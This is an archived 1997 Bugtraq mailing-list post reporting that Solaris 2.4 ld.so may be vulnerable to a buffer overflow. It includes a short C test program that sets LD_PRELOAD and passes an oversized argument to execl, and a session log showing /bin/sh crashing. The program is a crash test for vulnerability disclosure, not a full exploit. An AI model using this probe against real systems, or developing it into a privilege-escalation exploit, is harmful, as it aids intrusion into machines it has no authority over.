Bugtraq mailing list archives
Solaris ld.so possibly vulnerable?
From: dan () DIMSUM TCH HARVARD EDU (Dan Fleisher)
Date: Fri, 18 Jul 1997 11:40:28 -0400
Hi, here is the results of a test which indicate that Solaris (2.4 at least) ld.so might be vulnerable to this overflow: Script started on Fri Jul 18 11:22:08 1997 bash$ id uid=2011(dan) gid=110(chnd) bash$ uname -a SunOS dimsum 5.4 Generic_101945-10 sun4m sparc bash$ cat sot.c main(int argc, char **argv) { char b[2048]; char err[] = "bad args\n"; char err2[] = "execl failed\n"; if(argc != 2) { write(2, err, sizeof(err)); exit(1); } memset(b, 'A', sizeof(b)); putenv("LD_PRELOAD=foobar"); execl(argv[1], b, 0); write(2, err2, sizeof(err2)); } bash$ sot /bin/sh Segmentation Fault (core dumped) bash$ exit script done on Fri Jul 18 11:22:47 1997 --- Dan Fleisher <dan () dimsum tch harvard edu>
Current thread:
- Solaris ld.so possibly vulnerable? Dan Fleisher (Jul 18)
- Re: Solaris ld.so possibly vulnerable? Illuminatus Primus (Jul 20)
- AIX xlock (Exploit) Bryan P. Self (Jul 20)
- Re: Solaris ld.so possibly vulnerable? Adam Morrison (Jul 21)
- Re: Solaris ld.so possibly vulnerable? Casper Dik (Jul 22)
- ICMP ECHO_REQUEST on BROADCAST--HOWTO Filter! Michael Douglass (Jul 21)
- Re: ICMP ECHO_REQUEST on BROADCAST--HOWTO Filter! Mfm (Jul 29)
- Re: ICMP ECHO_REQUEST on BROADCAST--HOWTO Filter! Corey Lindsly (Jul 29)
- portability fixes to mSQL patches (fwd) David Sacerdote (Jul 29)
- Re: ICMP ECHO_REQUEST on BROADCAST--HOWTO Filter! Mfm (Jul 29)